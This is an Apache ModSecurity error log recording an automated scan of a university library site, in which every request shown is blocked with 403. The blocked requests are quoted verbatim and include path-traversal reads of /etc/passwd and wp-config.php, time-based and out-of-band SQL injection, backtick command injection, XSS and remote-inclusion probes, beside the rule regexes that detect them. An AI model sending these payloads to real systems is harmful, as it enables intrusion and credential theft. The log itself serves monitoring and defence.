[Tue Aug 29 11:43:06.411353 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeX1EQAAAAK"]
[Tue Aug 29 11:43:07.426515 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAcoNnIAAAAF"]
[Tue Aug 29 11:43:08.562920 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdftV8AAAAG"]
[Tue Aug 29 11:43:08.615583 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAevkRAAAAAA"]
[Tue Aug 29 11:43:09.374004 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAeCha8AAAAw"]
[Tue Aug 29 11:43:10.375425 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAARpg5gAAAAU"]
[Tue Aug 29 11:43:11.486677 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAevkR8AAAAA"]
[Tue Aug 29 11:43:14.476760 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAXNuZwAAAAg"]
[Tue Aug 29 11:43:15.653102 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdQ3mEAAAAV"]
[Tue Aug 29 11:43:18.440975 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAActbQIAAAAH"]
[Tue Aug 29 11:43:18.443944 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAc922gAAAAD"]
[Tue Aug 29 11:43:20.382431 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAeChcgAAAAw"]
[Tue Aug 29 11:43:21.426929 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdQ3nIAAAAV"]
[Tue Aug 29 11:43:21.508395 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdQ3nQAAAAV"]
[Tue Aug 29 11:43:23.454268 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAcvBoAAAAAJ"]
[Tue Aug 29 11:43:25.419854 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13bcCo-f0AAAexICMAAAAN"]
[Tue Aug 29 11:43:27.635271 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfAOZwAAAAH"]
[Tue Aug 29 11:43:28.652558 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe397MAAAAA"]
[Tue Aug 29 11:43:29.512180 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfEBswAAAAO"]
[Tue Aug 29 11:43:30.419553 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAdTBIsAAAAY"]
[Tue Aug 29 11:43:31.387828 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfBLy8AAAAI"]
[Tue Aug 29 11:43:36.377141 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAdb7qwAAAAb"]
[Tue Aug 29 11:43:37.442038 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAfFKAQAAAAR"]
[Tue Aug 29 11:43:40.383246 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAdb7rIAAAAb"]
[Tue Aug 29 11:43:40.511100 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAdb7rcAAAAb"]
[Tue Aug 29 11:43:42.559961 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdftbQAAAAG"]
[Tue Aug 29 11:43:43.355479 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAdxUYMAAAAC"]
[Tue Aug 29 11:43:45.396692 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAXNueEAAAAg"]
[Tue Aug 29 11:43:47.402968 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAeChfoAAAAw"]
[Tue Aug 29 11:43:48.416437 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAARpg-kAAAAU"]
[Tue Aug 29 11:43:48.471763 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAc4EsIAAAAP"]
[Tue Aug 29 11:43:49.467671 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAeX1JgAAAAK"]
[Tue Aug 29 11:43:50.376254 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAenGcEAAAAM"]
